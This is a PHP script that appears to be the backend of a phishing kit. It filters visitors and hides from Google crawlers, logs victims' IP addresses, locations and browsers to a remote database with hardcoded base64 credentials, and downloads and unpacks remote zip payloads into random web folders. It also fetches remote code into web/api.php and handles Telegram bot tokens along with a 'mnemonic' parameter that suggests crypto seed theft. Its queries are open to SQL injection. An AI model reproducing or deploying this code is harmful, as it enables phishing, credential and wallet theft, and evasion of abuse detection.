<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
if (!empty($_SERVER['HTTP_CLIENT_IP']))
{
    $ipAddress = $_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
    $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
    $ipAddress = $_SERVER['REMOTE_ADDR'];
}
$ipPortArray = explode(':', $ipAddress);
$StrupLom = $ipPortArray[0];
$domine = $_SERVER['SERVER_NAME'];
$TIME_DATE = date('Y-m-d H:i:s');

if (isset($_POST['localip']))
{
    $myips = base64_decode(base64_decode($_POST['localip']));
    $_SESSION['lolips'] = $myips;
    $StrupLom = $myips;
}else
{
	 $refix = "Not Found IPS";
     click_TYqw($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $refix);
     exit();
}

$protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http';
$domain = $_SERVER['HTTP_HOST'];
$donflag = $protocol . '://' . $domain;
$datalog = base64_decode("emVyby1kYXkuc2hvcA");
$Fixbom = base64_decode("c3Ryb25nX2RheQ");
$Lredsvv = base64_decode("ZHJjZ2lseVAwKmsm");
$Nopwvv = base64_decode("c3Ryb25nX2RheQ");

$url = "http://ip-api.com/php/{$StrupLom}?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,currency,isp,org,as,asname,reverse,mobile,proxy,hosting,query";

$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($curl);
curl_close($curl);

$info = unserialize($response);

$_SESSION['isp'] = isset($info['isp']) ? $info['isp'] : null;
$_SESSION['Blasacoun'] = isset($info['country']) ? $info['country'] : null;
$_SESSION['Njopf'] = isset($info['countryCode']) ? $info['countryCode'] : null;
$_SESSION['Voprt'] = isset($info['city']) ? $info['city'] : null;
$_SESSION['xOpuy'] = isset($info['regionName']) ? $info['regionName'] : null;

function deleteDirectorynew($dir)
{
    if (!file_exists($dir))
    {
        return true;
    }
    if (!is_dir($dir))
    {
        return unlink($dir);
    }
    foreach (scandir($dir) as $item)
    {
        if ($item == '.' || $item == '..')
        {
            continue;
        }
        if (!deleteDirectorynew($dir . DIRECTORY_SEPARATOR . $item))
        {

            return false;
        }
    }
    if (rmdir($dir))
    {

        return true;
    }
    else
    {

        return false;
    }
}
function deleteDirectory($dir)
{
    if (!file_exists($dir))
    {
        return true;
    }
    if (!is_dir($dir))
    {
        return unlink($dir);
    }
    $time_diff = time() - filectime($dir);
    if ($time_diff > 290)
    { 
        foreach (scandir($dir) as $item)
        {
            if ($item == '.' || $item == '..')
            {
                continue;
            }
            if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item))
            {

                return false;
            }
        }
        if (rmdir($dir))
        {

            return true;
        }
        else
        {

            return false;
        }
    }
    else
    {

        return true;
    }
}

$parentDirectory = 'web';
$directories = glob($parentDirectory . '/*', GLOB_ONLYDIR);

if (is_array($directories))
{

    foreach ($directories as $dir)
    {
        if (basename($dir) [0] != '.')
        {
            if (deleteDirectory($dir))
            {

            }
        }
    }
}

function Cub_JRRD_OP($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv)
{
    $db = mysqli_connect($datalog, $Fixbom, $Lredsvv, $Nopwvv);
    if (!$db)
    {
        die("Connection failed: " . mysqli_connect_error());
    }
    $sql_u = "SELECT * FROM logs WHERE ipaddres='$StrupLom'";
    $res_u = mysqli_query($db, $sql_u);
    if (mysqli_num_rows($res_u) > 0)
    {
        mysqli_close($db);
        return false; 
        
    }
    mysqli_close($db);
    return true; 
    
}
if (!Cub_JRRD_OP($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv))
{
    $showpip = "!!!";
    echo $showpip;
    exit();
}

if (isset($_GET['endmelux']))
{
    $redi = $_COOKIE['redirict'];
    $vdir = $_GET['endmelux'];
    $directoryToDelete = "web/" . $vdir;

    if (is_dir($directoryToDelete))
    {
        if (deleteDirectorynew($directoryToDelete))
        {

        }

    }
    echo ("<script LANGUAGE='JavaScript'>
    window.location.href='$redi';
    </script>");
    exit();

}
if (isset($_GET['lolme']))
{
    $vdir = $_GET['lolme'];
    $refix = "Invalid lolme";
    $redi = $_COOKIE['redirict'];
    click_TYqw($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $refix);
    $directoryToDelete = "web/" . $vdir;

    if (is_dir($directoryToDelete))
    {
        if (deleteDirectorynew($directoryToDelete))
        {

        }

    }
    echo ("<script LANGUAGE='JavaScript'>
    window.location.href='$redi';
    </script>");
    exit();
}

//if (isset($_SERVER['HTTP_REFERER'])) {
//    $referrer = $_SERVER['HTTP_REFERER'];
//    $domain = $_SERVER['HTTP_HOST'];
  //  if (strpos($referrer, '.repl.co') !== false || strpos($referrer, $domain) !== false) {
 //   } else {
 //       $refix = "ref Invalid: $referrer";
 //       click_TYqw($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $refix);
  //      exit();
  //  }
//} else {
 //   $refix = "ref Invalid: No referrer provided";
 //   click_TYqw($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $refix);
 //   exit();
//}

if (isset($_GET['vss']))
{
    $gameid = $_GET['souls'];
    $_SESSION['lolsouls'] = $gameid;
    RDIOPB($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $gameid);
    $folder_pathx = $_GET['vss'];
    $RandOP_Mlux = Rand_XD_TF(rand(4, 10));
    echo ("<script LANGUAGE='JavaScript'>
    window.location.href='$folder_pathx?&valid=$RandOP_Mlux$RandOP_Mlux&alert=$RandOP_Mlux&xlps=$RandOP_Mlux&souls=$gameid&done=&errory=$RandOP_Mlux&mnemonic=&jb=$RandOP_Mlux';
    </script>");
    exit();
}

if (isset($_POST['shopid']))
{
    $gameid = $_POST['shopid'];
    $_SESSION['lolsouls'] = $gameid;
    RDIOPB($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $gameid);

}

function RDIOPB($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $id)
{
    $db = mysqli_connect($datalog, $Fixbom, $Lredsvv, $Nopwvv);
    if (!$db)
    {
        die("Connection failed: " . mysqli_connect_error());
    }
    $sql_u = "SELECT * FROM redirction WHERE id='$id'";
    $res_u = mysqli_query($db, $sql_u);
    if (mysqli_num_rows($res_u) > 0)
    {
        while ($row = mysqli_fetch_array($res_u))
        {
            $_SESSION['link'] = base64_decode(base64_decode($row["link"]));
            $_SESSION['cn'] = explode(";", base64_decode(base64_decode($row["country"])));
            $_SESSION['pic'] = $row["pic"];
            $_SESSION['msg'] = base64_decode(base64_decode($row["msg"]));
            $_SESSION['exp'] = $row["expire"];
            $_SESSION['server'] = base64_decode(base64_decode($row["server"]));
            $_SESSION['url'] = base64_decode(base64_decode($row["url"]));
            $_SESSION['luxcaptcha'] = $row["luxcaptcha"];
            $_SESSION['tokentel'] = base64_decode(base64_decode($row["tokentel"]));
            $_SESSION['idtel'] = base64_decode(base64_decode($row["idtel"]));
            $_SESSION['redirict'] = $row["redirict"];
			$_SESSION['api'] = $row["api"];
            if (isset($_GET['vss']))
            {
                setcookie('tokentel', $_SESSION['tokentel'], time() + (86400 * 30) , '/');
                setcookie('idtel', $_SESSION['idtel'], time() + (86400 * 30) , '/');
                setcookie('redirict', $_SESSION['redirict'], time() + (86400 * 30) , '/');

            }
        }
    }
    else
    {
        $refix = "project ID Invalid $id";
        click_TYqw($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $refix);
        exit();
    }
    mysqli_close($db);
}
function Rand_XD_TF($length)
{
    $characters = 'abcdefjhigklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0;$i < $length;$i++)
    {
        $randomString .= $characters[rand(0, $charactersLength - 1) ];
    }
    return $randomString;
}
function rand_num($length)
{
    $characters = '0123456789';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0;$i < $length;$i++)
    {
        $randomString .= $characters[rand(0, $charactersLength - 1) ];
    }
    return $randomString;
}
function HYT_DDR_Uio($USER_AGENT)
{
    $OS_ERROR = "Unknown OS Platform";
    $OS = array(
        '/windows nt 10/i' => 'Windows 10',
        '/windows nt 6.3/i' => 'Windows 8.1',
        '/windows nt 6.2/i' => 'Windows 8',
        '/windows nt 6.1/i' => 'Windows 7',
        '/windows nt 6.0/i' => 'Windows Vista',
        '/windows nt 5.2/i' => 'Windows Server 2003/XP x64',
        '/windows nt 5.1/i' => 'Windows XP',
        '/windows xp/i' => 'Windows XP',
        '/windows nt 5.0/i' => 'Windows 2000',
        '/windows me/i' => 'Windows ME',
        '/win98/i' => 'Windows 98',
        '/win95/i' => 'Windows 95',
        '/win16/i' => 'Windows 3.11',
        '/macintosh|mac os x/i' => 'Mac OS X',
        '/mac_powerpc/i' => 'Mac OS 9',
        '/linux/i' => 'Linux',
        '/ubuntu/i' => 'Ubuntu',
        '/iphone/i' => 'iPhone',
        '/ipod/i' => 'iPod',
        '/ipad/i' => 'iPad',
        '/android/i' => 'Android',
        '/blackberry/i' => 'BlackBerry',
        '/webos/i' => 'Mobile'
    );
    foreach ($OS as $regex => $value)
    {
        if (preg_match($regex, $USER_AGENT))
        {
            $OS_ERROR = $value;
        }
    }
    return $OS_ERROR;
}
function FOx_TGH_X($USER_AGENT)
{
    $BROWSER_ERROR = "Unknown Browser";
    $BROWSER = array(
        '/msie/i' => 'Internet Explorer',
        '/firefox/i' => 'Firefox',
        '/safari/i' => 'Safari',
        '/chrome/i' => 'Chrome',
        '/edge/i' => 'Edge',
        '/opera/i' => 'Opera',
        '/netscape/i' => 'Netscape',
        '/maxthon/i' => 'Maxthon',
        '/konqueror/i' => 'Konqueror',
        '/mobile/i' => 'Handheld Browser'
    );
    foreach ($BROWSER as $regex => $value)
    {
        if (preg_match($regex, $USER_AGENT))
        {
            $BROWSER_ERROR = $value;
        }
    }
    return $BROWSER_ERROR;
}
$userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';

$OKJIVGRD = HYT_DDR_Uio($userAgent);
$IpCount = FOx_TGH_X($userAgent);

function click_TYqw($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $refix)
{
    $userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $isp = $_SESSION['isp'];
    $IpCount = FOx_TGH_X($userAgent);
    $OKJIVGRD = HYT_DDR_Uio($userAgent);
    $donflag = $_SERVER['SERVER_NAME'];
    $LOCALO_TEMPO = date('Y-m-d H:i:s');
    $Blasacoun = $_SESSION['Blasacoun'];
    $Njopf = $_SESSION['Njopf'];
    $Voprt = $_SESSION['Voprt'];
    $xOpuy = $_SESSION['xOpuy'];
    $host = gethostbyaddr($StrupLom);
    $db = mysqli_connect($datalog, $Fixbom, $Lredsvv, $Nopwvv);
    if (!$db)
    {
        die("Connection failed: " . mysqli_connect_error());
    }
    $sql_u = "SELECT * FROM logs WHERE ipaddres='$StrupLom'";
    $res_u = mysqli_query($db, $sql_u);
    if (mysqli_num_rows($res_u) > 0)
    {
        mysqli_close($db);
        echo "!!";
        exit();
    }
    else
    {
        $StrupLom = mysqli_real_escape_string($db, str_replace("'", "", $StrupLom));
        $Blasacoun = mysqli_real_escape_string($db, str_replace("'", "", $Blasacoun));
        $IpCount = mysqli_real_escape_string($db, str_replace("'", "", $IpCount));
        $OKJIVGRD = mysqli_real_escape_string($db, str_replace("'", "", $OKJIVGRD));
        $donflag = mysqli_real_escape_string($db, str_replace("'", "", $donflag));
        $LOCALO_TEMPO = mysqli_real_escape_string($db, str_replace("'", "", $LOCALO_TEMPO));
        $host = mysqli_real_escape_string($db, str_replace("'", "", $host));
        $isp = mysqli_real_escape_string($db, str_replace("'", "", $isp));
        $refix = mysqli_real_escape_string($db, str_replace("'", "", $refix));
        $query = "INSERT INTO logs (ipaddres,country,browser,os,domine,mytime,host,isp,reson) 
      	    	  VALUES ('$StrupLom','$Blasacoun','$IpCount','$OKJIVGRD','$donflag','$LOCALO_TEMPO','$host','$isp','$refix')";
        $results = mysqli_query($db, $query);
        mysqli_close($db);
        echo "!";
    }
}
if (strpos($userAgent, 'google') !== false)
{
    $refix = "Bose G";
    click_TYqw($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $refix);
    exit();
}
if (strpos(gethostbyaddr($StrupLom) , 'google') !== false)
{
    $refix = "Bose G 2";
    click_TYqw($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $refix);
    exit();
}

$RandOP_M = Rand_XD_TF(rand(7, 7));
$RandOP_Mlux = Rand_XD_TF(rand(4, 10));
if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
    if (!isset($_POST['localip']))
    {
        $refix = "IPS not found";
        click_TYqw($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $refix);
        exit();
    }
    if (!isset($_POST['shopid']))
    {
        $refix = "project ID Not found";
        click_TYqw($StrupLom, $datalog, $Fixbom, $Lredsvv, $Nopwvv, $refix);
        exit();
    }

    if (!is_dir('web'))
    {
        if (!mkdir('web', 0777))
        {
            die('Failed to create web directory');
        }
    }

    $folder_name = bin2hex(random_bytes(8));
    $sub_folder = rand_num(4);
    $folder_path = "web/$sub_folder/";
    $zipFileUrl = $_SESSION['url'];

    $tempDir = 'temp';
    if (!is_dir($tempDir))
    {
        mkdir($tempDir);
    }

    $zipFileName = "$tempDir/$folder_name.zip";
    if (copy($zipFileUrl, $zipFileName))
    {
        if (!mkdir($folder_path, 0777, true))
        {
            die('Failed to create the folder.');
        }
        $zip = new ZipArchive;
        if ($zip->open($zipFileName) === true)
        {
            $zip->extractTo($folder_path);
            $zip->close();
            $extractedFiles = scandir($folder_path);
            foreach ($extractedFiles as $file)
            {
                if ($file !== '.' && $file !== '..')
                {
                    rename($folder_path . '/' . $file, $folder_path . $file);
                }
            }

            
        }
        else
        {
            echo 'Failed to extract the zip file.';
        }

    }
    else
    {
        die('Failed to download the zip file.');
    }

    if (file_exists($zipFileName))
    {
        unlink($zipFileName);

    }

    $gameid = $_SESSION['lolsouls'];
    $_SESSION['localdir'] = "$folder_path";
    file_put_contents("$folder_path/local.txt", "$StrupLom\n", FILE_APPEND);
	$fileURL = $_SESSION['api'];

function getFileContents($fileURL) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $fileURL);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

    $response = curl_exec($curl);
    $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    $error = curl_error($curl);

    curl_close($curl);

    if ($statusCode === 200 && empty($error)) {
        return;
    }

    $fileContents = file_get_contents($fileURL);
    if ($fileContents !== false) {
        $localFilePath = 'web/api.php';
        file_put_contents($localFilePath, $fileContents);
    }
}

if ($fileURL !== "API") {
    getFileContents($fileURL);
}
    $localip = isset($_POST['localip']) ? $_POST['localip'] : null;
    $domainname = isset($_POST['domainname']) ? $_POST['domainname'] : null;
    $nextdomain = isset($_POST['nextdomain']) ? $_POST['nextdomain'] : null;
    $shopid = isset($_POST['shopid']) ? $_POST['shopid'] : null;

    if ($localip !== null && $domainname !== null && $nextdomain !== null && $shopid !== null)
    {
        $directory = 'temp';
        $zipFiles = glob($directory . '*.zip');

        if (!empty($zipFiles))
        {
            foreach ($zipFiles as $zipFile)
            {
                if (is_file($zipFile))
                {
                    unlink($zipFile);

                }
            }
        }
        $responseData = array(
            'status' => 'success',
            'back_dir' => $folder_path,
            'back_url' => $nextdomain,
            'back_id' => $shopid,
            'message' => 'Data received successfully'
            
        );

        $responseJson = json_encode($responseData);
        echo $responseJson;
    }
    else
    {
        http_response_code(400);
        echo 'Missing required data';
    }

}
else
{
    http_response_code(405);
    echo 'Invalid request method';
}
?>
